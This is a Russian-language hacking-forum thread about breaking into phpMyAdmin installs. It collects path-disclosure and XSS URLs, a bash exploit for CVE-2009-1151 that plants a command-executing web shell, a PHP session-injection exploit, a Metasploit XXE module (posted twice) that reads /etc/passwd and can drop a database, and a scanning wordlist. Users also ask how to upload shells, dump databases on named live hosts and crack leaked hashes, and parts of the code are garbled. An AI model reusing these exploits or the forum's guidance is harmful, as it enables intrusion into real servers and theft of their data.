Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc. php on line 17

Уязвимый код:
<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
* WARNING: This script has to be included at the very end of your code because
* it will stop the script execution!
*/

require_once('./libraries/relation.lib.php'); // for PMA_setHistory()

/**
* Query window
*/

// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>

http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submit s.inc.php on line 385

Уязвимый код:
if ($run_parts) {
$sql_query .= $a_query . ';' . "\n";
if ($query_type != 'drop_db') {
PMA_DBI_select_db($db);
}
$result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);
} // end if
} // end for

if ($use_sql) {
require('./sql.php');
} elseif (!$run_parts) {
PMA_DBI_select_db($db);
$result = PMA_DBI_query($sql_query);
}

}

?>



(C)Xcontrol212

как узнать точную версию phpMyAdmin
По changelog.php
Пример:
http://87.106.94.86/phpmyadmin/changelog.php

/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

раскрытие путей в 3.* версиях

Fatal error: Call to undefined function pma_issuperuser() in /www/html/pma/libraries/check_user_privileges.lib.php on line 16

Проверялось на версии 3.2.0.1
XSS то они походу заделали, но как всегда получили что то другое, в нашем случае раскрытие путей ;)

http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
имея такой доступ что можно зделать ? залить шел или слить базу какнибуть можно?

http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi

if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h ost%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne ct_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth _type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b} }}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host %27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp re%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be val"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2 2%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:% 22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`

# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi

# milw0rm.com [2009-06-09]


Блин, извиняюсь за глупый вопрос:
но чем запустить ?
под виндой?

to:Sidarovich1975
Cygwin =)

#!/bin/bash под виндой :confused: Наврядли :D

[SIZE="3"]phpMyAdmin ';//PHP code to execute

/*Settings*/

/*-------------------------------------------EXPLOIT CODE-------------------------------------------*/

$count_redirects=0;

$max_redirects=5;

//отправляем http-данные

//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1

functionsend_data($method,$url,$data='',$referer_s tring='',$cookie_string='',$ua_string='Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9 .1.8) Gecko/20100202 Firefox/3.5.8',$other_headers='',$timeout=30,$show=0,$foll ow_redirect=0)

{

global$count_redirects,$max_redirects;

$return='';

$feof_count=0;

$parsed_url=parse_url($url);

$site=$parsed_url['host'];

$path=$parsed_url['path'];

$query=$parsed_url['query'];

if(preg_match('@_$@i',$query) && !preg_match('@_$@i',$url))

$query=rtrim($query,'_');

if(preg_match('@_$@i',$path) && !preg_match('@_$@i',$url))

$path=rtrim($path,'_');

($method=='GET'&& !empty($data)) ?$path.='?'.$data:'';

($method=='GET'&& !empty($query) && empty($data)) ?$path.='?'.$query:'';

($method=='POST'&& !empty($query)) ?$path.='?'.$query:'';



if($fp=fsockopen($site,80,$errno,$errstr,$ timeout))

{

($method=='POST') ?$out="POST$pathHTTP/1.1\r\n":$out="GET$pathHTTP/1.1\r\n";

$out.="Host:$site\r\n";

$out.="Content-type: application/x-www-form-urlencoded\r\n";

$out.="Connection: Close\r\n";

$out.="User-Agent:$ua_string\r\n";

!empty($referer_string) ?$o ut.="Referer:$referer_string\r\n":'';

!empty($cookie_string) ?$ou t.="Cookie:$cookie_string\r\n":'';

!empty($other_headers) ?$out.=$ot her_headers:'';

($method=='POST') ?$out.="Content-Length: ".strlen($data)."\r\n\r\n":$out.="\r\n";

($method=='POST') ?fwrite($fp,$ou t.$data) :fwrite($fp,$out);

while (!feof($fp))

{

if($feof_count>=10000)

break;



$return.=fread($fp,4800);

++$feof_count;

}

fclose($fp);

if($follow_redirect)

{

if($count_redirects$errno, 'errstr'=>$errstr);

}

$pmaurl=rtrim($pmaurl,'/').'/index.php';

//Regards to asddas

$sess_path= array('/tmp/',

'/var/tmp/',

'/var/lib/php/',

'/var/lib/php4/',

'/var/lib/php5/',

'/var/lib/php/session/',

'/var/lib/php4/session/',

'/var/lib/php5/session/',

'/shared/sessions',

'/var/php_sessions/',

'/var/sessions/',

'/tmp/php_sessions/',

'/tmp/sessions/',

'../../../tmp/',

'../../../../tmp/',

'../../../../../tmp/',

'../../../../../../tmp/',

'../../../../../../../tmp/',

'../../../temp/',

'../../../../temp/',

'../../../../../temp/',

'../../../../../../temp/',

'../../../../../../../temp/',

'../../../sessions/',

'../../../../sessions/',

'../../../../../sessions/',

'../../../../../../sessions/',

'../../../../../../../sessions/',

'../../../phptmp/',

'../../../../phptmp/',

'../../../../../phptmp/',

'../../../../../../phptmp/',

'../../../../../../../phptmp/');

//1. Token, Session name and Cookies

$token_page=send_data('GET',$pmaurl);

preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);



$token=$token_array[1];



preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);



$cookie_array=$cookie_array[1];

$cookie_array=implode("; ",$cookie_array);

preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array);

$session=$session_array[1];

//2. Inject into session testing

$sess_test_page='';

$o=0;

$good_inj=false;

do

{

$inj=$sess_path[$o].'sess_'.$session;

$query=$pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($inj).':"'.$inj.'";}}');

$sess_test_page=send_data('GET',$query,'',$pmaurl, $cookie_array);

$sess_test_page2=send_data('GET',$pmaurl.'?token=' .$token,'',$pmaurl,$cookie_array);

if(stristr($sess_test_page2,'PMA_Config'))

{

$good_inj=$inj;

flush();

print'[+] '.$inj.' - good path
';

break;

}

else

{

flush();

print'[-] '.$inj.' - bad path
';

}

$o++;

}

while($o[COLOR="#007700"]

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection


require 'msf/core'

class Metasploit3 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
'Version' => '1.0',
'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
The attacker must be logged in to MySQL via phpMyAdmin.
Works on Windows and Linux Versions 3.3.X and 3.4.X},
'References' =>
[
[ 'CVE', '2011-4107' ],
[ 'OSVDB', '76798' ],
[ 'BID', '50497' ],
[ 'URL', 'http://secforce.com/research/'],
],
'Author' => [ 'Marco Batista' ],
'License' => MSF_LICENSE
)

register_options(
[
Opt::RPORT(80),
OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password']),
OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
],self.class)
end

def loginprocess
# HTTP GET TO GET SESSION VALUES
getresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'GET',
'version' => '1.1',
}, 25)

if (getresponse.nil?)
print_error("no response for #{ip}:#{rport}")
elsif (getresponse.code == 200)
print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
print_status("Received 302 to #{getresponse.headers['Location']}")
else
print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
end

valuesget = getresponse.headers["Set-Cookie"]
varsget = valuesget.split(" ")

#GETTING THE VARIABLES NEEDED
phpMyAdmin = varsget.grep(/phpMyAdmin/).last
pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
# END HTTP GET

# LOGIN POST REQUEST TO GET COOKIE VALUE
postresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'application/x-www-form-urlencoded',
'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
},
'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
}, 25)

if (postresponse["Location"].nil?)
print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
else
tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
end


valuespost = postresponse.headers["Set-Cookie"]
varspost = valuespost.split(" ")

#GETTING THE VARIABLES NEEDED
pmaUser = varspost.grep(/pmaUser-1/).last
pmaPass = varspost.grep(/pmaPass-1/).last

return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
# END OF LOGIN POST REQUEST
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
print_error(e.message)
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
print_error(e.message)
end

def readfile(cookie,tokenvalue)
#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
getfiles = send_request_cgi({
'uri' => datastore['APP']+'/export.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
}, 25)

if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
print_error("Error reading the file... not enough privilege? login error?")
else
print_status("#{getfiles.body}")
end
end


def dropdatabase(cookie,tokenvalue)
dropdb = send_request_cgi({
'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
'method' => 'GET',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
}, 25)

print_status("Dropping database: "+datastore['DB'])
end

def run
cookie,tokenvalue = loginprocess()

print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

craftedXML = "------WebKitFormBoundary3XPL01T\n"
craftedXML \n"
craftedXML ]>\n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML &conteudo;\n"
craftedXML \n"
craftedXML \n"
craftedXML \n\n"
craftedXML datastore['APP']+'/import.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
'Cookie' => cookie
},
'data' => craftedXML
}, 25)

readfile(cookie,tokenvalue)

if (datastore['DROP'] == "true")
dropdatabase(cookie,tokenvalue)
else
print_status("Database was not dropped: "+datastore['DB'])
end

end
end

http://1337day.com/exploits/17376​

P.S. Date: 12-01-2012

calendar.php?GLOBALS

иожно узнать точную версию, если > 3.*


Часто мануалы не удаляют, а зря. Можно и так версию определить

.../phpmyadmin/Documentation.html

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection

require 'msf/core'

class Metasploit3 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
'Version' => '1.0',
'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
The attacker must be logged in to MySQL via phpMyAdmin.
Works on Windows and Linux Versions 3.3.X and 3.4.X},
'References' =>
[
[ 'CVE', '2011-4107' ],
[ 'OSVDB', '76798' ],
[ 'BID', '50497' ],
[ 'URL', 'http://secforce.com/research/'],
],
'Author' => [ 'Marco Batista' ],
'License' => MSF_LICENSE
)

register_options(
[
Opt::RPORT(80),
OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password']),
OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
],self.class)
end

def loginprocess
# HTTP GET TO GET SESSION VALUES
getresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'GET',
'version' => '1.1',
}, 25)

if (getresponse.nil?)
print_error("no response for #{ip}:#{rport}")
elsif (getresponse.code == 200)
print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
print_status("Received 302 to #{getresponse.headers['Location']}")
else
print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
end

valuesget = getresponse.headers["Set-Cookie"]
varsget = valuesget.split(" ")

#GETTING THE VARIABLES NEEDED
phpMyAdmin = varsget.grep(/phpMyAdmin/).last
pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
# END HTTP GET

# LOGIN POST REQUEST TO GET COOKIE VALUE
postresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'application/x-www-form-urlencoded',
'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
},
'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
}, 25)

if (postresponse["Location"].nil?)
print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
else
tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
end


valuespost = postresponse.headers["Set-Cookie"]
varspost = valuespost.split(" ")

#GETTING THE VARIABLES NEEDED
pmaUser = varspost.grep(/pmaUser-1/).last
pmaPass = varspost.grep(/pmaPass-1/).last

return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
# END OF LOGIN POST REQUEST
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
print_error(e.message)
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
print_error(e.message)
end

def readfile(cookie,tokenvalue)
#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
getfiles = send_request_cgi({
'uri' => datastore['APP']+'/export.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
}, 25)

if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
print_error("Error reading the file... not enough privilege? login error?")
else
print_status("#{getfiles.body}")
end
end


def dropdatabase(cookie,tokenvalue)
dropdb = send_request_cgi({
'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
'method' => 'GET',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
}, 25)

print_status("Dropping database: "+datastore['DB'])
end

def run
cookie,tokenvalue = loginprocess()

print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

craftedXML = "------WebKitFormBoundary3XPL01T\n"
craftedXML \n"
craftedXML ]>\n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML &conteudo;\n"
craftedXML \n"
craftedXML \n"
craftedXML \n\n"
craftedXML datastore['APP']+'/import.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
'Cookie' => cookie
},
'data' => craftedXML
}, 25)

readfile(cookie,tokenvalue)

if (datastore['DROP'] == "true")
dropdatabase(cookie,tokenvalue)
else
print_status("Database was not dropped: "+datastore['DB'])
end

end
end

http://1337day.com/exploits/17376​
P.S. Date: 12-01-2012


Объясни плиз как и чем запускать этот сплоит?

Ребят, подскажите что можно сделать с этим


go all materials

НА одном из сайтов админ видимо случайно оставил такую ссылку. Что в этих хешах?

Ребят, подскажите что можно сделать с этим

go all materials

НА одном из сайтов админ видимо случайно оставил такую ссылку. Что в этих хешах?


Да вроде ничего существенного, два мд5 хэша (если не ошибаюсь).

Ну я не пойму почему их 2. Может в одном из них пароль к пхпадмину? я знаю адрес входа и логин того узера. Неплохо было бы расшифровать хеши и только знать бы пароль ли в них?

либо авторизоваться как то с помощью 'этих хешей либо кук

[QUOTE="абвгдешка"]
[SIZE="3"]phpMyAdmin

Есть ли еще способы узнать полный путь в phpMyAdmin? Просто все способы указанные в первом посте очень стары и не актуальны ( Хотя бы если есть полные права пользователя?

phpmyadmin активная XSS

тест;phpMyAdmin 3.4.*

скрипт; /setup/index.php

путь;index.php?page=servers&mode=edit&id=1

уязвимое поле ;Server hostname;

http://i54.fastpic.ru/thumb/2012/1226/10/e07a913574528e3e0a22c05f039b4310.jpeg (http://fastpic.ru/view/54/2012/1226/e07a913574528e3e0a22c05f039b4310.png.html)

нашел только что , не проверял есть ли в интернете.

Недавно делал себе словарик для поиска. Может кому пригодится.


/_phpMyAdmin/
/admin/
/admin/mysql/
/admin/phpmyadmin/
/admin/pma/
/db/
/dbadmin/
/myadmin/
/mysql-admin/
/mysql/
/mysqladmin/
/mysqlmanager/
/p/m/a/
/php-my-admin/
/php-myadmin/
/phpm/
/phpmanager/
/phpmy-admin/
/phpmy/
/phpMyA/
/phpmyad-sys/
/phpmyad/
/phpMyAdmin/
/phpMyAdmin-1.1.0/
/phpMyAdmin-1.3.0/
/phpMyAdmin-2.0.5/
/phpMyAdmin-2.1.0/
/phpMyAdmin-2.10.0-rc1/
/phpMyAdmin-2.10.0.1/
/phpMyAdmin-2.10.0.2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.10.1-rc1/
/phpMyAdmin-2.10.1/
/phpMyAdmin-2.10.2/
/phpMyAdmin-2.10.3-rc1/
/phpMyAdmin-2.10.3/
/phpMyAdmin-2.11.0-rc2/
/phpMyAdmin-2.11.0/
/phpMyAdmin-2.11.1-rc1/
/phpMyAdmin-2.11.1.1/
/phpMyAdmin-2.11.1.2/
/phpMyAdmin-2.11.1/
/phpMyAdmin-2.11.10.1/
/phpMyAdmin-2.11.10/
/phpMyAdmin-2.11.11-rc1/
/phpMyAdmin-2.11.11.1/
/phpMyAdmin-2.11.11.2/
/phpMyAdmin-2.11.11.3/
/phpMyAdmin-2.11.11/
/phpMyAdmin-2.11.2-rc1/
/phpMyAdmin-2.11.2.1/
/phpMyAdmin-2.11.2.2/
/phpMyAdmin-2.11.2/
/phpMyAdmin-2.11.3-rc1/
/phpMyAdmin-2.11.3/
/phpMyAdmin-2.11.4-rc1/
/phpMyAdmin-2.11.4/
/phpMyAdmin-2.11.5-rc1/
/phpMyAdmin-2.11.5.1/
/phpMyAdmin-2.11.5.2/
/phpMyAdmin-2.11.5/
/phpMyAdmin-2.11.6-rc1/
/phpMyAdmin-2.11.6/
/phpMyAdmin-2.11.7-rc1/
/phpMyAdmin-2.11.7-rc2/
/phpMyAdmin-2.11.7.1/
/phpMyAdmin-2.11.7/
/phpMyAdmin-2.11.8-rc1/
/phpMyAdmin-2.11.8.1/
/phpMyAdmin-2.11.8/
/phpMyAdmin-2.11.9.1/
/phpMyAdmin-2.11.9.2/
/phpMyAdmin-2.11.9.3/
/phpMyAdmin-2.11.9.4/
/phpMyAdmin-2.11.9.5/
/phpMyAdmin-2.11.9.6/
/phpMyAdmin-2.11.9/
/phpMyAdmin-2.2.0/
/phpMyAdmin-2.2.1/
/phpMyAdmin-2.2.2/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.4/
/phpMyAdmin-2.2.5/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.2.7-pl1/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3-pl1/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2.4/
/phpMyAdmin-2.9.0.1/
/phpMyAdmin-2.9.0.2/
/phpMyAdmin-2.9.0/
/phpMyAdmin-2.9.1.1/
/phpMyAdmin-2.9.2-rc1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-2/
/phpMyAdmin-3.0.0-alpha/
/phpMyAdmin-3.0.0-rc2/
/phpMyAdmin-3.0.0/
/phpMyAdmin-3.0.1-rc1/
/phpMyAdmin-3.0.1.1/
/phpMyAdmin-3.0.1/
/phpMyAdmin-3.1.0-beta1/
/phpMyAdmin-3.1.0-rc1/
/phpMyAdmin-3.1.0/
/phpMyAdmin-3.1.1/
/phpMyAdmin-3.1.2-rc1/
/phpMyAdmin-3.1.2/
/phpMyAdmin-3.1.3-rc1/
/phpMyAdmin-3.1.3.1/
/phpMyAdmin-3.1.3.2/
/phpMyAdmin-3.1.3/
/phpMyAdmin-3.1.4-rc1/
/phpMyAdmin-3.1.4-rc2/
/phpMyAdmin-3.1.4/
/phpMyAdmin-3.1.5-rc1/
/phpMyAdmin-3.1.5/
/phpMyAdmin-3.2.0-beta1/
/phpMyAdmin-3.2.0-rc1/
/phpMyAdmin-3.2.0.1/
/phpMyAdmin-3.2.0/
/phpMyAdmin-3.2.1/
/phpMyAdmin-3.2.2-rc1/
/phpMyAdmin-3.2.2.1/
/phpMyAdmin-3.2.2/
/phpMyAdmin-3.2.3-rc1/
/phpMyAdmin-3.2.3/
/phpMyAdmin-3.2.4-rc1/
/phpMyAdmin-3.2.4/
/phpMyAdmin-3.2.5-rc1/
/phpMyAdmin-3.2.5-rc2/
/phpMyAdmin-3.2.5/
/phpMyAdmin-3.3.0-alpha1/
/phpMyAdmin-3.3.0-beta1/
/phpMyAdmin-3.3.0-rc1/
/phpMyAdmin-3.3.0-rc2/
/phpMyAdmin-3.3.0-rc3/
/phpMyAdmin-3.3.0/
/phpMyAdmin-3.3.1-rc1/
/phpMyAdmin-3.3.1/
/phpMyAdmin-3.3.10-rc1/
/phpMyAdmin-3.3.10.1/
/phpMyAdmin-3.3.10.2/
/phpMyAdmin-3.3.10.3/
